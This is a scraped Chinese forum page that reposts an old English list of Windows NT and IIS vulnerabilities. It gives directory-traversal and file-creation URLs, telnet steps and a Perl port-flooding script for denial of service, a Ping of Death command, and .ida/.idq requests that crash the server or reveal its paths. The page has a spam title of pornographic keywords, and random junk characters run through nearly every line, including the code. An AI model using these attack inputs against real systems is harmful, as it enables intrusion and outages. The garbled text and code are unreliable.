亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

<address id="xly8e"><var id="xly8e"><center id="xly8e"></center></var></address>
<kbd id="xly8e"><dl id="xly8e"></dl></kbd>


<bdo id="xly8e"><mark id="xly8e"><legend id="xly8e"></legend></mark></bdo>
  • 

    • <span id="xly8e"><delect id="xly8e"></delect></span>
    

    汶上信息港
    
標(biāo)題: NT的漏洞及描述(英文) [打印本頁]
    

    
作者: 雜七雜八    時間: 2011-1-13 17:12
    
標(biāo)題: NT的漏洞及描述(英文)
    受影響系統(tǒng):4.0,iis 1.0
    
" T2 X; Q' {, q7 dA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.% d7 j/ W: ^4 c' u1 R8 S5 d
    
! K2 `9 i8 ^5 N9 j  `7 a
    
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
    
6 h& {! P( }6 ]/ Q. ~" n0 J2 e; Y0 m3 w3 c, w
    
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
    
) P0 b7 A4 l. }; y8 r7 W
    
) X% K+ ^' C$ C  c* g--------------------------------------------------------------------
    
# X# O6 P  O4 F! i- I. u0 e( B7 e0 r7 ]" v' o4 V; `
    
受影響系統(tǒng):4.0
    
: E: y, n. Q+ k; E/ BA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
    
; e# t* Q8 r$ B$ T; y& }& [
    
# @2 @' m6 [$ d/ hIf the file 'target.bat' exists, the file will be truncated.
    
: v  W$ g3 v. P. K. M# a% y# w0 l/ N+ k; B& S' A
    

    
# H  G8 {$ X8 A3 YA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
    
" E, n- |0 h3 ^- l7 ^! e! i' p; {) @0 _! |% r, u* R) a
    
----------------------------------------------------------------------
    
8 |4 u! c0 ]7 o0 l7 B$ Y  T7 T. q+ S/ a5 Q9 L
    
受影響系統(tǒng):3.51,4.0: G5 {) c/ s0 y1 W6 Q: c* A) p
    
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.5 D5 t! j  }5 z6 s8 d  g7 L6 X
    
6 o- |) w  ^. l
    
The following steps;* [( A  C% X1 l* V6 K' _3 Z3 l
    

    
/ U% c* k8 b/ D( yTelnet to an NT 4.0 system on port 135 
    
% l1 O6 J: E! f$ HType about 10 characters followed by a <CR> 7 ~& Y+ A' ^! x( R2 w4 T$ J
    
Exit Telnet 3 V3 e( m0 y+ E) a  i
    
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.% C# I$ g# o1 i
    
" U: P7 S; t& R( H- m% K
    
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
    
( n" `6 d: V, X) b* _
    
/ ?4 a# J. T, X3 k; x/ }The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
    
. F" z7 r1 z2 i% r, H; N6 e  U  J9 `$ x, Z4 [
    
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
    
+ Q/ U) ^: D! X1 ]  p- i5 c5 v& a/ d" B* g
    
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
    
5 u* q0 p# i  x/ P# h
    
9 }9 _+ l7 A; K: x' \2 ?/*begin poke code*/
    
6 f# e4 D# n0 X3 g7 |1 k' x
    
9 g0 ~7 o/ n& @# P6 i) W% Ouse Socket;
    
2 T$ H5 c; F  ]use FileHandle;
    
* |- x2 e& Z' n$ Yrequire "chat2.pl";1 r' X  h* |; Z7 Y# s2 k
    
; x( T( _/ M' Q" o+ T
    
$systemname = $ARGV[0] && shift;
    
8 v5 B. B) y" `* ?0 |/ l. E3 j( Y5 K" Q; r
    
$verbose = 1; # tell me what you're hitting
    
5 A! j0 q+ p  ?3 o( f, B$knownports = 1; # don't hit known problem ports
    
% y' C- Y: r7 b# S& Pfor ($port = $0; $port<65535; $port++) 6 c. L% L7 h6 i& O. H2 C
    
{
    
0 v0 {: ]- I. y1 j! T
    
& v7 e* e: @: z3 R1 I, B& N; `  M8 U4 v  D
    
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {& W7 s& d% y- Z
    
next;7 h) H0 }; C4 b
    
}# q0 M- i* v0 F9 K$ }' d
    
$fh = chat::open_port($systemname, $port);
    
: Z) v' O# i& B0 ~: C6 \# T7 Xchat::print ($fh,"This is about ten characters or more");
    
$ ]2 g% w: t( B' z8 L; M' {; hif ($verbose) {! C- ^& C  ^+ Q1 k" I9 T
    
print "Trying port: $port\n";
    
0 U' }- S, H- k} 6 n7 K  O" N2 P, U; f
    
chat::close($fh);5 a# U3 \$ z4 c1 S
    

    
  Z2 _3 c3 Y0 z& a8 q$ {* g# }}' y1 q+ v9 X5 g& ~: B1 X3 b; o* a
    
( v  C+ o8 m# c+ M" G
    
% ?/ L% K2 W& S6 X
    
/*end poke code*/
    
2 ]; E+ z# t. Z" T4 ]- @/ i! y( H! J9 j% m. M2 ?
    
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername9 g; D2 u9 Y7 ]- ?! f
    
5 X! W1 x) w- V" y+ @' Y7 E
    
--------------------------------------------------------------------------------6 J1 Y: R0 u( {
    
: ^- _; {6 N( ~1 C' R  z" K
    
受影響系統(tǒng):4.0/ b! e; N7 o" t% T
    
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
    
- w4 C6 J/ g2 z/ `# u
    
" L- Y2 _8 f; D) U7 aThis attack causes Dr. Watson to display an alert window and to log an error: & a# X' ]) B- l. ^& O4 d4 Z; M
    

    
3 X1 C# L8 B2 [8 X6 B+ n"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 ]0 {% j9 i( e+ O4 v2 C
    

    
( i& a5 `- ^* f  S8 {--------------------------------------------------------------------------------/ G; k6 L1 a) ]8 x) l5 S
    
) R/ _/ D3 G# M1 A$ Z
    
受影響系統(tǒng):3.51,4.0
    
9 J1 s: e- e& ^0 g: d0 sLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:" W. @* o. b, ~# W9 R
    
4 o: `3 l9 N* x' |
    
STOP: 0X0000001E
    
7 m% U; R) ?, q: |) H" fKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS: U! w4 o5 T- `! s
    

    
9 Y. j# z1 u3 [- q" T-OR-
    
% l, \: X' O0 M  N; w* g
    
1 h$ S  D& J" V* g8 ?5 k& _STOP: 0x0000000A
    
! n$ e! c3 _, x! I/ Z+ l8 JIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS7 ?/ ^1 J1 a( }3 @
    

    
; \. ~. o) c) t2 w- S" P# HNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
    
- F) f! [' g; J) [7 e. D5 k" C4 b
    
--------------------------------------------------------------------------------/ }" }, P  W2 V4 J
    

    
" L% l/ k- h" j9 V1 V0 vMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 
    
3 `8 V' {5 w) S. }  a" f! X9 ^" I& I; Q7 U. O( [
    
--------------------------------------------------------
    
: _7 N' @# L7 [& |3 g- m' _' a. t$ e  V+ X  z' |* f& G1 _
    
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server




    

    

    歡迎光臨 汶上信息港 (http://m.loveproblemguru.com/)

Powered by Discuz! X3.5